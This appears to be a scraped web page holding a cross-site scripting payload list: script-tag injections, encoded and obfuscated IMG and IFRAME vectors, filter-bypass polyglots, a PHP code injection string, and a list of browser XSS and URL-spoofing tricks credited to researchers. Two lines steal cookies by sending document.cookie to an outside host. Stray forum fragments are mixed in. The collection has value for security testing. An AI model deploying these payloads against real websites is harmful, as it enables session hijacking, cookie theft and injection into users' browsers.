--></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/*

< script > < / script>

&lt

<

&LT

<

<

<<

<<<

"><script>"</p>
<p><script>alert("XSS")</script>

<<script>alert("XSS");//<</script>

<script>alert(document.cookie)</script>

'><script>alert(document.cookie)</script>

'><script>alert(document.cookie);</script>

";alert('XSS');//

%3cscript%3ealert("XSS");%3c/script%3e

%3cscript%3ealert(document.cookie);%3c%2fscript%3e

%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E

&ltscript&gtalert(document.cookie);</script>

&ltscript&gtalert(document.cookie);&ltscript&gtalert

<xss><script>alert('XSS')</script></vulnerable></xss>

IMG%20SRC='javascript:alert(document.cookie)'

<IMG SRC="javascript:alert('XSS')"

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=javascript:alert("'XSS'")>

<IMG """><script>alert("XSS")</script>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG%20SRC='javasc ript:alert(document.cookie)'>

IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E

"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>

%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<script>alert(String.fromCharCode(88,83,83))</script>=&{}

'';!--"<xss>=&{()}</xss>

<name>','')); phpinfo(); exit;/*</name>

<![CDATA[<script>var n=0;while(true){n;}</script>]]>

<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>

<?xml version="1.0" encoding="ISO-8859-1"?><foo>SCRIPT]]>alert('XSS');/SCRIPT]]></foo>

<xml ID=I><x><c><![CDATA[]]></c></x>

<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<img language=vbs src=<b onerror=alert#1/1#>

Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'

Reverse 401 basic auth phishing by @jackmasa POC:

document.domain='com' chrome/safari same domain suffix cross-domain trick.

Safari empty location bar bug by @jackmasa POC:

Safari location object pollution tech: by @kinugawamasato

Safari URL spoofing about://mmme.me POC:

Opera URL spoofing vuln data://mmme.me by @jackmasa POC:

Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera

New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F

Opera data:message/rfc822 #XSS by @insertScript

IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>

IE cool expression xss

Clever webkit xss auditor bypass trick <script?=data:,alert(1)<!-- by @cgvwzq

Bypass IE8 version flash docuemnt object protection by @jackmasa

Bypass IE all version flash docuemnt object protection by @gainover1

Bypass IE9 flash docuemnt object protection by @irsdl

Bypass IE8 flash docuemnt object protection by @irsdl

New XSS vector (#Opera Specific) <svg><scRipt %00>prompt(/@soaj1664ashar/)</svg>

IE xss filter bypass 0day : <xml:namespace prefix=t><import namespace=t implementation=..... by @gainover1 #IE #0day

<iframe srcdoc="<svg/onload=alert(/@80vul/)>"> #chrome</p>
</iframe>

: TheKingOfDuck
2019-03-09 10:59 0 回复

This is a test:

<img src=x onerror=confirm(CoolCat)><plaintext/onmouseover=prompt("CoolCat")>

发布投稿

0x01 About

0x02 server

0x03 AddUsers

0x03 Test

0x03 Summary

SRC

XSS

E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes

vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356

VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]

CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>

ES #FF for(location of ['javascript:alert(/ff/)']);

E4X function::['location']='javascript'':alert(/FF/)'

Firefox click <script>eval(test'')</script> by @cgvwzq

jQuery super less-xss,work in IE: $(URL) 6 chars

Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap

IE <iframe><iframe src=javascript:alert(/@jackmasa/)></iframe>